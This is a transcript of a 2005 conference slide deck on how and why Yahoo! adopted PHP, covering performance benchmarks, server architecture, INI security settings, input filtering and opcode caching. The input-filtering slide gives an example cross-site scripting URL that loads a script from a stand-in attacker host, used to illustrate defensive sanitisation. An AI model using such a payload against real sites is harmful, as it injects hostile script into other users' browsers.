php at yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500...

26
1 PHP at Yahoo! http://public.yahoo.com/~radwin/ Michael J. Radwin October 20, 2005

Upload: others

Post on 01-Aug-2020

26 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

1

PHP at Yahoo!http://public.yahoo.com/~radwin/

Michael J. RadwinOctober 20, 2005

Page 2: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

2

Outline

• Yahoo!, as seen by an engineer• Choosing PHP in 2002• PHP architecture at Yahoo!

Page 3: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

3

The Internet’s most trafficked site

Page 4: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

4

25 countries, 13 languages

Page 5: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

5

Yahoo! by the Numbers

• 411M unique visitors per month• 191M active registered users• 11.4M fee-paying customers• 3.4B average daily pageviews

October 2005

Page 6: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

6

Page 7: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

7

Engineering Values

1. Security & Privacy– We must protect our customers’ information

2. High Availability– If the site is offline, we’re missing the opportunity

to serve our customers3. Performance

– We serve billions of pageviews a day4. Flexibility & Innovation

– Customize site for each market– Rapid development of new features

Page 8: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

8

From Proprietary to Open Source

94 95 96 97 98 99 00 01 02 03 04 05

WebServer Apache

“Filo Server”

WebLang

yScript

DB

Flat Files

Page 9: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

9

Choosing a LanguageHow and Why We Selected PHP

Page 10: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

10

Choosing PHP: brief history

• October 2001: 3 proprietary languages– Costly to continue to maintain each– Limited features (no subroutines!)

• Committee began researching– Compare features, performance– Build vs. Buy vs. Open Source

• PHP selected May 2002

Page 11: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

11

Ideal Language Criteria

1. High performance2. Robust, sand-boxed3. Language features

• Loops, conditionals• Complex data-types

4. C/C++ extensions5. Runs on FreeBSD

8. Interpreted ordynamically compiled

9. i18n support10. Clean separation of

presentation/content/app semantics

11. Low training costs12. Doesn’t require CS

degree to use

Page 12: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

12

Top 10 Language Choices

mod_include

XSLT

yScript

Page 13: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

13

Performance: Requests

Requests/sec

0

50

100

150

200

250

300

350

25 50 75 100 150 200 300 400 500

Concurrent requests

req

/s

PHP

YSP

HF2k

Network max

mod_perl

yScript

Page 14: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

14

Performance: Memory

Active Virtual Memory

0

200000

400000

600000

800000

1000000

25 50 75 100 150 200 300 400 500

Concurrent requests

kb

yte

s a

cti

ve

PHP

YSP

HF2k

mod_perl

yScript

Page 15: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

15

Why we picked PHP

1. Designed for web scripting2. High performance3. Large, Open Source community

• Documentation, easy to hire developers4. “Code-in-HTML” paradigm

<html><?php echo "Hello World"; ?>

</html>

5. Integration, libraries, extensibility6. Tools: IDE, debugger, profiler

Page 16: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

16

PHP at Yahoo! Today

Page 17: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

17

Yahoo!’s Development Methodology

• Server Architecture• File Layout• Dependency Management• Security• Performance• Globalization

Page 18: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

18

UserProfileServer

web server

Server Architecture

web serverWeb Server

Scripts

Load Balancer

AdServer

WebServices

Apache

Page 19: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

19

File Layout

HTML Templates/usr/local/share/htdocs/*.php

Template Helpers/usr/local/share/htdocs/*.inc

Business Logic/usr/local/share/pear/*.inc

C/C++ Core CodeData access, Networking, Crypto

50% HTML

50% PHP

0% HTML

100% PHP

0% HTML

0% PHP

95% HTML

5% PHP

Page 20: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

20

Dependency Management

• Base PHP package depends only onXML parser./configure --disable-all

• Self-Contained Extensions– mysql, dba, curl, ldap, pcre, gd, iconv– To enable

1. Install/usr/local/lib/php/20020429/mysql.so

2. Add “extension = mysql.so” tophp.ini

– Avoids unnecessary dependencies– Smaller Apache memory footprint

Page 21: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

21

Security: INI Settings

• open_basedir

– Insurance against /etc/passwd exploits• allow_url_fopen = Off

– Use libcurl extension instead– Avoid open proxy exploits

• display_errors = Off

– However, log_errors = On• safe_mode = Off

– Intended for shared hosting environment

Page 22: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

22

Security: Input Filtering

http://search.yahoo.com/search?p=<script+src=http://evil.com/x.js>

• Cross Site Scripting (XSS) most common attack– Also “SQL Injection”

• Normal approach– strip_tags()

– mysqli_escape_string()

– Examine every line code– Tedious and error-prone

• Use input_filter hook– Sanitize all user-submitted data– GET/POST/Cookie

Page 23: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

23

Performance: Opcode Caches

• Easiest performance boost– Cache parsed .php scripts

in shared memory– Optimizations– No code modifications!

• Several products available– Zend Performance Suite– APC– Turck MMCache

Page 24: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

24

Performance: PHP Extensions in C++

• PHP ships with 80extensions written in C/C++

• Yahoo! develops its ownproprietary extensions– Fast execution speed– Access to client libraries

• Longer development cycle– Edit, compile, link, debug– Manual memory-

management

Page 25: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

25

Globalization: PHP Unicode

• Native Unicode support in 2006• Collaborative effort

– Andrei Zmievski (Yahoo!)– Andi Gutmans (Zend)– Many members of PHP Community

+ + ICU = 6

Page 26: PHP at Yahoo! · 2005-10-20 · 0 50 100 150 200 250 300 350 25 50 75 100 150 200 300 400 500 Concurrent ... 25 50 75 100 150 200 300 400 500 Concurrent requests k b y t e s a c t

26